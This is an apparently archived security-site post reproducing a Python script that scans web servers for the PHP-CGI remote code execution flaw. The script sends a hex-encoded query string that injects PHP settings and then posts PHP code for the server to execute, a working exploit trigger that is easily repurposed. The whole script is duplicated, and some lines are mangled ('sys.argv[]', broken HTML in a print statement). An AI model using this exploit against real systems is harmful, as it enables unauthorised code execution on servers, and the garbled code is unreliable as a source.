PHP-CGI Remote Code Execution Scanner
11 March, 2014 - 04:43 — cisc0ninja
PHP-CGI Remote Code Execution Scanner - This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfigurations.
Authored by infodox
#!/usr/bin/python2
# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - insecurety.net - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys
def scan(target):
paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
for path in paths:
probe(target, path)
def probe(target, path):
print "[*] Testing Path: %s" %(path)
trigger = path + "/?"
trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
url = target + trigger
php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
try:
haxor = requests.post(url, php)
if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
print "Exploitable!"
except Exception:
print "Err, Someshit broke"
def main(args):
if len(sys.argv) !=2:
print "Usage: %s <target>" %(sys.argv[])
print "Eg: %s <a href="http://lol.com"" title="http://lol.com"">http://lol.com"</a> %(sys.argv[])
sys.exit()
target = sys.argv[1]
print "[*] Target is: %s" %(target)
scan(target)
if __name__ == "__main__":
main(sys.argv)
#_EOF infodox 2013
# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - insecurety.net - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys
def scan(target):
paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
for path in paths:
probe(target, path)
def probe(target, path):
print "[*] Testing Path: %s" %(path)
trigger = path + "/?"
trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
url = target + trigger
php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
try:
haxor = requests.post(url, php)
if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
print "Exploitable!"
except Exception:
print "Err, Someshit broke"
def main(args):
if len(sys.argv) !=2:
print "Usage: %s <target>" %(sys.argv[])
print "Eg: %s <a href="http://lol.com"" title="http://lol.com"">http://lol.com"</a> %(sys.argv[])
sys.exit()
target = sys.argv[1]
print "[*] Target is: %s" %(target)
scan(target)
if __name__ == "__main__":
main(sys.argv)
#_EOF infodox 2013